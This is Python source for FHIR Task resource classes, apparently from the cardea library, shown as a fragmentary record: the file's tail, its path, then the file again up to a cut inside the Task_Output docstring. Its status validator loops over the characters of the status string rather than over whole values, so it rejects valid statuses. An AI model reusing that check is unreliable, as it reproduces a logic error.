'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAddress'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valuePeriod'},
{'parent_entity': 'DataRequirement',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDataRequirement'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueQuantity'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Input',
'child_variable': 'valueReference'},
{'parent_entity': 'TriggerDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueTriggerDefinition'},
{'parent_entity': 'Duration',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDuration'},
{'parent_entity': 'ElementDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueElementDefinition'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueMoney'},
{'parent_entity': 'Range',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRange'},
{'parent_entity': 'Signature',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSignature'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueUsageContext'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCoding'},
{'parent_entity': 'Dosage',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDosage'},
{'parent_entity': 'Narrative',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueNarrative'},
{'parent_entity': 'Element',
'parent_variable': 'id',
'child_entity': 'Task_Input',
'child_variable': 'valueElement'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAnnotation'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'type'},
{'parent_entity': 'Count',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCount'},
{'parent_entity': 'Ratio',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRatio'},
{'parent_entity': 'Distance',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDistance'},
{'parent_entity': 'BackboneElement',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueBackboneElement'},
{'parent_entity': 'ContactPoint',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContactPoint'},
{'parent_entity': 'Age',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAge'},
{'parent_entity': 'Timing',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueTiming'},
{'parent_entity': 'ParameterDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueParameterDefinition'},
{'parent_entity': 'HumanName',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueHumanName'},
{'parent_entity': 'SampledData',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSampledData'},
]
class Task_Output(fhirbase):
"""
A task to be performed.
Attributes:
type: The name of the Output parameter.
valueBoolean: The value of the Output parameter as a basic type.
valueInteger: The value of the Output parameter as a basic type.
valueDecimal: The value of the Output parameter as a basic type.
valueBase64Binary: The value of the Output parameter as a basic type.
valueInstant: The value of the Output parameter as a basic type.
valueString: The value of the Output parameter as a basic type.
valueUri: The value of the Output parameter as a basic type.
valueDate: The value of the Output parameter as a basic type.
valueDateTime: The value of the Output parameter as a basic type.
valueTime: The value of the Output parameter as a basic type.
valueCode: The value of the Output parameter as a basic type.
valueOid: The value of the Output parameter as a basic type.
valueUuid: The value of the Output parameter as a basic type.
valueId: The value of the Output parameter as a basic type.
valueUnsignedInt: The value of the Output parameter as a basic type.
valuePositiveInt: The value of the Output parameter as a basic type.
valueMarkdown: The value of the Output parameter as a basic type.
valueElement: The value of the Output parameter as a basic type.
valueExtension: The value of the Output parameter as a basic type.
valueBackboneElement: The value of the Output parameter as a basic
type.
valueNarrative: The value of the Output parameter as a basic type.
valueAnnotation: The value of the Output parameter as a basic type.
valueAttachment: The value of the Output parameter as a basic type.
valueIdentifier: The value of the Output parameter as a basic type.
valueCodeableConcept: The value of the Output parameter as a basic
type.
valueCoding: The value of the Output parameter as a basic type.
valueQuantity: The value of the Output parameter as a basic type.
valueDuration: The value of the Output parameter as a basic type.
valueSimpleQuantity: The value of the Output parameter as a basic
type.
valueDistance: The value of the Output parameter as a basic type.
valueCount: The value of the Output parameter as a basic type.
valueMoney: The value of the Output parameter as a basic type.
valueAge: The value of the Output parameter as a basic type.
valueRange: The value of the Output parameter as a basic type.
valuePeriod: The value of the Output parameter as a basic type.
valueRatio: The value of the Output parameter as a basic type.
valueReference: The value of the Output parameter as a basic type.
valueSampledData: The value of the Output parameter as a basic type.
valueSignature: The value of the Output parameter as a basic type.
valueHumanName: The value of the Output parameter as a basic type.
valueAddress: The value of the Output parameter as a basic type.
valueContactPoint: The value of the Output parameter as a basic type.
valueTiming: The value of the Output parameter as a basic type.
valueMeta: The value of the Output parameter as a basic type.
valueElementDefinition: The value of the Output parameter as a basic
type.
valueContactDetail: The value of the Output parameter as a basic type.
valueContributor: The value of the Output parameter as a basic type.
valueDosage: The value of the Output parameter as a basic type.
valueRelatedArtifact: The value of the Output parameter as a basic
type.
valueUsageContext: The value of the Output parameter as a basic type.
valueDataRequirement: The value of the Output parameter as a basic
type.
valueParameterDefinition: The value of the Output parameter as a basic
type.
valueTriggerDefinition: The value of the Output parameter as a basic
type.
"""
__name__ = 'Task_Output'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.valueBoolean = None
# type: bool
self.valueInteger = None
# type: int
self.valueDecimal = None
# type: int
self.valueBase64Binary = None
# type: str
self.valueInstant = None
# type: str
self.valueString = None
# type: str
self.valueUri = None
# type: str
self.valueDate = None
# type: str
self.valueDateTime = None
# type: str
self.valueTime = None
# type: str
self.valueCode = None
# type: str
self.valueOid = None
# type: str
self.valueUuid = None
# type: str
self.valueId = None
# type: str
self.valueUnsignedInt = None
# type: int
self.valuePositiveInt = None
# type: int
self.valueMarkdown = None
# type: str
self.valueElement = None
# reference to Element: id
self.valueExtension = None
# reference to Extension
self.valueBackboneElement = None
# reference to BackboneElement
self.valueNarrative = None
# reference to Narrative
self.valueAnnotation = None
# reference to Annotation
self.valueAttachment = None
# reference to Attachment
self.valueIdentifier = None
# reference to Identifier
self.valueCodeableConcept = None
# reference to CodeableConcept
self.valueCoding = None
# reference to Coding
self.valueQuantity = None
# reference to Quantity
self.valueDuration = None
# reference to Duration
self.valueSimpleQuantity = None
# reference to Quantity
self.valueDistance = None
# reference to Distance
self.valueCount = None
# reference to Count
self.valueMoney = None
# reference to Money
self.valueAge = None
# reference to Age
self.valueRange = None
# reference to Range
self.valuePeriod = None
# reference to Period
self.valueRatio = None
# reference to Ratio
self.valueReference = None
# reference to Reference: identifier
self.valueSampledData = None
# reference to SampledData
self.valueSignature = None
# reference to Signature
self.valueHumanName = None
# reference to HumanName
self.valueAddress = None
# reference to Address
self.valueContactPoint = None
# reference to ContactPoint
self.valueTiming = None
# reference to Timing
self.valueMeta = None
# reference to Meta
self.valueElementDefinition = None
# reference to ElementDefinition
self.valueContactDetail = None
# reference to ContactDetail
self.valueContributor = None
# reference to Contributor
self.valueDosage = None
# reference to Dosage
self.valueRelatedArtifact = None
# reference to RelatedArtifact
self.valueUsageContext = None
# reference to UsageContext
self.valueDataRequirement = None
# reference to DataRequirement
self.valueParameterDefinition = None
# reference to ParameterDefinition
self.valueTriggerDefinition = None
# reference to TriggerDefinition
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Signature',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSignature'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Output',
'child_variable': 'valueReference'},
{'parent_entity': 'BackboneElement',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueBackboneElement'},
{'parent_entity': 'RelatedArtifact',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRelatedArtifact'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSimpleQuantity'},
{'parent_entity': 'ContactPoint',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContactPoint'},
{'parent_entity': 'Extension',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueExtension'},
{'parent_entity': 'Age',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAge'},
{'parent_entity': 'Meta',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueMeta'},
{'parent_entity': 'Dosage',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDosage'},
{'parent_entity': 'TriggerDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueTriggerDefinition'},
{'parent_entity': 'Distance',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDistance'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCoding'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCodeableConcept'},
{'parent_entity': 'ElementDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueElementDefinition'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valuePeriod'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueIdentifier'},
{'parent_entity': 'DataRequirement',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDataRequirement'},
{'parent_entity': 'SampledData',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSampledData'},
{'parent_entity': 'Element',
'parent_variable': 'id',
'child_entity': 'Task_Output',
'child_variable': 'valueElement'},
{'parent_entity': 'HumanName',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueHumanName'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueMoney'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueQuantity'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContactDetail'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Count',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCount'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'type'},
{'parent_entity': 'Range',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRange'},
{'parent_entity': 'Timing',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueTiming'},
{'parent_entity': 'Duration',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDuration'},
{'parent_entity': 'Narrative',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueNarrative'},
{'parent_entity': 'ParameterDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueParameterDefinition'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAnnotation'},
{'parent_entity': 'Ratio',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRatio'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueUsageContext'},
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAddress'},
{'parent_entity': 'Contributor',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContributor'},
] | cardea/fhir/Task.py | from .fhirbase import fhirbase
class Task(fhirbase):
"""
A task to be performed.
Attributes:
resourceType: This is a Task resource
identifier: The business identifier for this task.
definitionUri: A reference to a formal or informal definition of the
task. For example, a protocol, a step within a defined workflow
definition, etc.
definitionReference: A reference to a formal or informal definition of
the task. For example, a protocol, a step within a defined workflow
definition, etc.
basedOn: BasedOn refers to a higher-level authorization that triggered
the creation of the task. It references a "request" resource such as
a ProcedureRequest, MedicationRequest, ProcedureRequest, CarePlan,
etc. which is distinct from the "request" resource the task is seeking
to fulfil. This latter resource is referenced by FocusOn. For
example, based on a ProcedureRequest (= BasedOn), a task is created to
fulfil a procedureRequest ( = FocusOn ) to collect a specimen from a
patient.
groupIdentifier: An identifier that links together multiple tasks and
other requests that were created in the same context.
partOf: Task that this particular task is part of.
status: The current status of the task.
statusReason: An explanation as to why this task is held, failed, was
refused, etc.
businessStatus: Contains business-specific nuances of the business
state.
intent: Indicates the "level" of actionability associated with the
Task. I.e. Is this a proposed task, a planned task, an actionable
task, etc.
priority: Indicates how quickly the Task should be addressed with
respect to other requests.
code: A name or code (or both) briefly describing what the task
involves.
description: A free-text description of what is to be performed.
focus: The request being actioned or the resource being manipulated by
this task.
for: The entity who benefits from the performance of the service
specified in the task (e.g., the patient).
context: The healthcare event (e.g. a patient and healthcare provider
interaction) during which this task was created.
executionPeriod: Identifies the time action was first taken against
the task (start) and/or the time final action was taken against the
task prior to marking it as completed (end).
authoredOn: The date and time this task was created.
lastModified: The date and time of last modification to this task.
requester: The creator of the task.
performerType: The type of participant that can execute the task.
owner: Individual organization or Device currently responsible for
task execution.
reason: A description or code indicating why this task needs to be
performed.
note: Free-text information captured about the task as it progresses.
relevantHistory: Links to Provenance records for past versions of this
Task that identify key state transitions or updates that are likely to
be relevant to a user looking at the current version of the task.
restriction: If the Task.focus is a request resource and the task is
seeking fulfillment (i.e is asking for the request to be actioned),
this element identifies any limitations on what parts of the
referenced request should be actioned.
input: Additional information that may be needed in the execution of
the task.
output: Outputs produced by the Task.
"""
__name__ = 'Task'
def __init__(self, dict_values=None):
self.resourceType = 'Task'
# type: str
# possible values: Task
self.definitionUri = None
# type: str
self.definitionReference = None
# reference to Reference: identifier
self.basedOn = None
# type: list
# reference to Reference: identifier
self.groupIdentifier = None
# reference to Identifier
self.partOf = None
# type: list
# reference to Reference: identifier
self.status = None
# type: str
# possible values: draft, requested, received, accepted,
# rejected, ready, cancelled, in-progress, on-hold, failed, completed,
# entered-in-error
self.statusReason = None
# reference to CodeableConcept
self.businessStatus = None
# reference to CodeableConcept
self.intent = None
# type: str
self.priority = None
# type: str
self.code = None
# reference to CodeableConcept
self.description = None
# type: str
self.focus = None
# reference to Reference: identifier
self._for = None
# reference to Reference: identifier
self.context = None
# reference to Reference: identifier
self.executionPeriod = None
# reference to Period
self.authoredOn = None
# type: str
self.lastModified = None
# type: str
self.requester = None
# reference to Task_Requester
self.performerType = None
# type: list
# reference to CodeableConcept
self.owner = None
# reference to Reference: identifier
self.reason = None
# reference to CodeableConcept
self.note = None
# type: list
# reference to Annotation
self.relevantHistory = None
# type: list
# reference to Reference: identifier
self.restriction = None
# reference to Task_Restriction
self.input = None
# type: list
# reference to Task_Input
self.output = None
# type: list
# reference to Task_Output
self.identifier = None
# type: list
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
for value in self.status:
if value is not None and value.lower() not in [
'draft', 'requested', 'received', 'accepted', 'rejected', 'ready',
'cancelled', 'in-progress', 'on-hold', 'failed', 'completed',
'entered-in-error']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'draft, requested, received, accepted, rejected, ready, cancelled,'
'in-progress, on-hold, failed, completed, entered-in-error'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'context'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'identifier'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'performerType'},
{'parent_entity': 'Task_Restriction',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'restriction'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'executionPeriod'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'basedOn'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'focus'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'reason'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'note'},
{'parent_entity': 'Task_Input',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'input'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'relevantHistory'},
{'parent_entity': 'Task_Requester',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'requester'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'definitionReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'code'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'owner'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'statusReason'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'groupIdentifier'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'partOf'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': '_for'},
{'parent_entity': 'Task_Output',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'output'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'businessStatus'},
]
class Task_Requester(fhirbase):
"""
A task to be performed.
Attributes:
agent: The device, practitioner, etc. who initiated the task.
onBehalfOf: The organization the device or practitioner was acting on
behalf of when they initiated the task.
"""
__name__ = 'Task_Requester'
def __init__(self, dict_values=None):
self.agent = None
# reference to Reference: identifier
self.onBehalfOf = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Requester',
'child_variable': 'onBehalfOf'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Requester',
'child_variable': 'agent'},
]
class Task_Restriction(fhirbase):
"""
A task to be performed.
Attributes:
repetitions: Indicates the number of times the requested action should
occur.
period: Over what time-period is fulfillment sought.
recipient: For requests that are targeted to more than on potential
recipient/target, for whom is fulfillment sought?
"""
__name__ = 'Task_Restriction'
def __init__(self, dict_values=None):
self.repetitions = None
# type: int
self.period = None
# reference to Period
self.recipient = None
# type: list
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Restriction',
'child_variable': 'period'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Restriction',
'child_variable': 'recipient'},
]
class Task_Input(fhirbase):
"""
A task to be performed.
Attributes:
type: A code or description indicating how the input is intended to be
used as part of the task execution.
valueBoolean: The value of the input parameter as a basic type.
valueInteger: The value of the input parameter as a basic type.
valueDecimal: The value of the input parameter as a basic type.
valueBase64Binary: The value of the input parameter as a basic type.
valueInstant: The value of the input parameter as a basic type.
valueString: The value of the input parameter as a basic type.
valueUri: The value of the input parameter as a basic type.
valueDate: The value of the input parameter as a basic type.
valueDateTime: The value of the input parameter as a basic type.
valueTime: The value of the input parameter as a basic type.
valueCode: The value of the input parameter as a basic type.
valueOid: The value of the input parameter as a basic type.
valueUuid: The value of the input parameter as a basic type.
valueId: The value of the input parameter as a basic type.
valueUnsignedInt: The value of the input parameter as a basic type.
valuePositiveInt: The value of the input parameter as a basic type.
valueMarkdown: The value of the input parameter as a basic type.
valueElement: The value of the input parameter as a basic type.
valueExtension: The value of the input parameter as a basic type.
valueBackboneElement: The value of the input parameter as a basic
type.
valueNarrative: The value of the input parameter as a basic type.
valueAnnotation: The value of the input parameter as a basic type.
valueAttachment: The value of the input parameter as a basic type.
valueIdentifier: The value of the input parameter as a basic type.
valueCodeableConcept: The value of the input parameter as a basic
type.
valueCoding: The value of the input parameter as a basic type.
valueQuantity: The value of the input parameter as a basic type.
valueDuration: The value of the input parameter as a basic type.
valueSimpleQuantity: The value of the input parameter as a basic type.
valueDistance: The value of the input parameter as a basic type.
valueCount: The value of the input parameter as a basic type.
valueMoney: The value of the input parameter as a basic type.
valueAge: The value of the input parameter as a basic type.
valueRange: The value of the input parameter as a basic type.
valuePeriod: The value of the input parameter as a basic type.
valueRatio: The value of the input parameter as a basic type.
valueReference: The value of the input parameter as a basic type.
valueSampledData: The value of the input parameter as a basic type.
valueSignature: The value of the input parameter as a basic type.
valueHumanName: The value of the input parameter as a basic type.
valueAddress: The value of the input parameter as a basic type.
valueContactPoint: The value of the input parameter as a basic type.
valueTiming: The value of the input parameter as a basic type.
valueMeta: The value of the input parameter as a basic type.
valueElementDefinition: The value of the input parameter as a basic
type.
valueContactDetail: The value of the input parameter as a basic type.
valueContributor: The value of the input parameter as a basic type.
valueDosage: The value of the input parameter as a basic type.
valueRelatedArtifact: The value of the input parameter as a basic
type.
valueUsageContext: The value of the input parameter as a basic type.
valueDataRequirement: The value of the input parameter as a basic
type.
valueParameterDefinition: The value of the input parameter as a basic
type.
valueTriggerDefinition: The value of the input parameter as a basic
type.
"""
__name__ = 'Task_Input'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.valueBoolean = None
# type: bool
self.valueInteger = None
# type: int
self.valueDecimal = None
# type: int
self.valueBase64Binary = None
# type: str
self.valueInstant = None
# type: str
self.valueString = None
# type: str
self.valueUri = None
# type: str
self.valueDate = None
# type: str
self.valueDateTime = None
# type: str
self.valueTime = None
# type: str
self.valueCode = None
# type: str
self.valueOid = None
# type: str
self.valueUuid = None
# type: str
self.valueId = None
# type: str
self.valueUnsignedInt = None
# type: int
self.valuePositiveInt = None
# type: int
self.valueMarkdown = None
# type: str
self.valueElement = None
# reference to Element: id
self.valueExtension = None
# reference to Extension
self.valueBackboneElement = None
# reference to BackboneElement
self.valueNarrative = None
# reference to Narrative
self.valueAnnotation = None
# reference to Annotation
self.valueAttachment = None
# reference to Attachment
self.valueIdentifier = None
# reference to Identifier
self.valueCodeableConcept = None
# reference to CodeableConcept
self.valueCoding = None
# reference to Coding
self.valueQuantity = None
# reference to Quantity
self.valueDuration = None
# reference to Duration
self.valueSimpleQuantity = None
# reference to Quantity
self.valueDistance = None
# reference to Distance
self.valueCount = None
# reference to Count
self.valueMoney = None
# reference to Money
self.valueAge = None
# reference to Age
self.valueRange = None
# reference to Range
self.valuePeriod = None
# reference to Period
self.valueRatio = None
# reference to Ratio
self.valueReference = None
# reference to Reference: identifier
self.valueSampledData = None
# reference to SampledData
self.valueSignature = None
# reference to Signature
self.valueHumanName = None
# reference to HumanName
self.valueAddress = None
# reference to Address
self.valueContactPoint = None
# reference to ContactPoint
self.valueTiming = None
# reference to Timing
self.valueMeta = None
# reference to Meta
self.valueElementDefinition = None
# reference to ElementDefinition
self.valueContactDetail = None
# reference to ContactDetail
self.valueContributor = None
# reference to Contributor
self.valueDosage = None
# reference to Dosage
self.valueRelatedArtifact = None
# reference to RelatedArtifact
self.valueUsageContext = None
# reference to UsageContext
self.valueDataRequirement = None
# reference to DataRequirement
self.valueParameterDefinition = None
# reference to ParameterDefinition
self.valueTriggerDefinition = None
# reference to TriggerDefinition
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCodeableConcept'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContactDetail'},
{'parent_entity': 'Contributor',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContributor'},
{'parent_entity': 'RelatedArtifact',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRelatedArtifact'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueIdentifier'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Meta',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueMeta'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSimpleQuantity'},
{'parent_entity': 'Extension',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueExtension'},
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAddress'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valuePeriod'},
{'parent_entity': 'DataRequirement',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDataRequirement'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueQuantity'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Input',
'child_variable': 'valueReference'},
{'parent_entity': 'TriggerDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueTriggerDefinition'},
{'parent_entity': 'Duration',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDuration'},
{'parent_entity': 'ElementDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueElementDefinition'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueMoney'},
{'parent_entity': 'Range',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRange'},
{'parent_entity': 'Signature',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSignature'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueUsageContext'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCoding'},
{'parent_entity': 'Dosage',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDosage'},
{'parent_entity': 'Narrative',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueNarrative'},
{'parent_entity': 'Element',
'parent_variable': 'id',
'child_entity': 'Task_Input',
'child_variable': 'valueElement'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAnnotation'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'type'},
{'parent_entity': 'Count',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCount'},
{'parent_entity': 'Ratio',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRatio'},
{'parent_entity': 'Distance',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDistance'},
{'parent_entity': 'BackboneElement',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueBackboneElement'},
{'parent_entity': 'ContactPoint',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContactPoint'},
{'parent_entity': 'Age',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAge'},
{'parent_entity': 'Timing',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueTiming'},
{'parent_entity': 'ParameterDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueParameterDefinition'},
{'parent_entity': 'HumanName',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueHumanName'},
{'parent_entity': 'SampledData',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSampledData'},
]
class Task_Output(fhirbase):
"""
A task to be performed.
Attributes:
type: The name of the Output parameter.
valueBoolean: The value of the Output parameter as a basic type.
valueInteger: The value of the Output parameter as a basic type.
valueDecimal: The value of the Output parameter as a basic type.
valueBase64Binary: The value of the Output parameter as a basic type.
valueInstant: The value of the Output parameter as a basic type.
